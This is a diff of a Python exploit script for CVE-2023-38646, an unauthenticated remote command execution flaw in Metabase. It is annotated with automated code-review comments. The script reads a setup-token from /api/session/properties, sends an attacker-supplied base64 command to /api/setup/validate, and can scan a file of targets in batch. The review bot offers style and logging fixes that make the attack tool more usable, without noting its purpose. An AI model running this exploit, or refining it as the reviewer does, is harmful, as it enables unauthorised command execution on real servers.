diff --git a/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py b/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
index 358dee6..ab1ff67 100644
--- a/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
+++ b/93-数据库专区/02-Metabase/CVE-2023-38646/cve-2023-38646.py
@@ -4,21 +4,35 @@ import argparse
 import requests
 import base64
+import logging
+
+logging.basicConfig(level=logging.INFO,
+ format='[%(asctime)s.%(msecs)03d] [%(levelname)s] : %(message)s',
+ )
+
+
+def check_host(host):
+ if host is None:
+ return False
+ if len(host) > 0:
+ return True
+ else:
+ return False
 def exploit(host, port, cmd, protocol='http://'):
 global setup_token
- target =protocol+ host + ':' + port
- print(f'Attacking {target}')
+ target = protocol + host + ':' + port
+ logging.info(f'[+] Attacking {target} ...')
 url = target + '/api/session/properties'
 step_one = requests.get(url, verify=False)
 result = step_one.json()
 try:
 setup_token = result['setup-token']
 except KeyError as e:
- print("setup-token missed")
+ logging.error("setup-token missed")
 exit(0)
- print(f'[+] setup-token={setup_token}')
+ logging.debug(f'[+] setup-token={setup_token}')
 check_url = target + '/api/setup/validate'
 response = requests.post(check_url,
 timeout=3,
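Review bot: `check_host` is added without a docstring and spells out a plain truthiness test over seven lines; it only rejects `None` and the empty string, so the name promises more validation than the function performs. I would reduce the body to `return bool(host)` and add a one-line docstring such as `"""Return True when host is a non-empty string; no format validation is done."""`. Separately, the root logger is configured at `logging.INFO`, so the `logging.debug(...)` call added here (and the one in the next hunk) is never emitted as written; if that is meant to keep the setup-token and response body out of default output, a short comment on the `basicConfig` call saying so would help. The body of `exploit` continues outside this hunk.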
@@ -44,16 +58,17 @@ def exploit(host, port, cmd, protocol='http://'):
 },
 }
 )
- print(f'[+] Server response:\n{response.text}')
+ logging.debug(f'[+] Server response: {response.text}')
+ logging.info(f'[+] Server resp code: {response.status_code}')
 if __name__ == '__main__':
 parser = argparse.ArgumentParser(description='exp for cve-2023-38346')
- parser.add_argument('--host', help='输入目标ip')
- parser.add_argument('--file', help='输入包含目标的文件')
- parser.add_argument('--port', default='3000', help='输入目标端口,默认为 3000')
- parser.add_argument('--cmd', type=str, required=True, help='输入目标ip')
 parser.add_argument('--protocol', type=str, default='http', help='输入目标协议,http或https')
+ parser.add_argument('--host', help='输入目标ip')
+ parser.add_argument('--port', default='3000', help='输入目标端口,默认为 3000')
+ parser.add_argument('--file', help='输入包含目标的文件')
+ parser.add_argument('--cmd', type=str, required=True, help='输入目标ip')
 args = parser.parse_args()
 protocol = args.protocol
@@ -74,6 +89,8 @@ if __name__ == '__main__':
 with open(host_file, 'r') as f:
 for temp_host in f:
 temp_host = temp_host.rstrip('\n')
+ if '://' in temp_host:
+ protocol = temp_host.split('://')[0] + '://'
 if ':' in temp_host:
 host = temp_host.split(':')[0]
 port = temp_host.split(':')[1]
@@ -81,14 +98,18 @@ if __name__ == '__main__':
 host = temp_host
 port = '3000'
 try:
- exploit(host, port, b64_cmd, protocol)
+ if check_host(host):
+ exploit(host, port, b64_cmd, protocol)
 except Exception as e:
- print(f'Connection error:\n{e}')
+ print(f'[-] Connection error:\n{e}')
+ continue
+
 else:
 host = args.host
 port = args.port
 try:
- exploit(host, port, b64_cmd, protocol)
+ if check_host(host):
+ exploit(host, port, b64_cmd, protocol)
 except Exception as e:
- print(f'Connection error:\n{e}')
+ logging.error(f'[-] Connection error:\n{e}')
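Review bot: The re-added `--cmd` argument in the `@@ -44,16 +58,17 @@` hunk still carries the help text of `--host` (`输入目标ip`), so `--help` describes the command parameter as a target address. Since the argument lines are being rewritten anyway, its help string should describe the command argument instead of repeating the host text. The parser description on the context line above also reads `cve-2023-38346`, while the file path says CVE-2023-38646; that looks like transposed digits and is worth correcting in the same pass. The `if __name__ == '__main__':` block continues outside the hunk.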
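Review bot: Error reporting in the `@@ -81,14 +98,18 @@` hunk is inconsistent: the file-loop branch still uses `print(f'[-] Connection error:\n{e}')` while the single-host branch was moved to `logging.error(...)`, so only one of the two gets the timestamped format configured at the top of the file. I would use `logging.error('[-] Connection error: %s', e)` in both branches. The added `continue` appears to be the last statement of the loop body and can be dropped. When `check_host(host)` is false the call is skipped with no message at all, so a `logging.warning('skipping empty host entry')` in an `else` would make that visible. The enclosing `__main__` block starts outside the hunk.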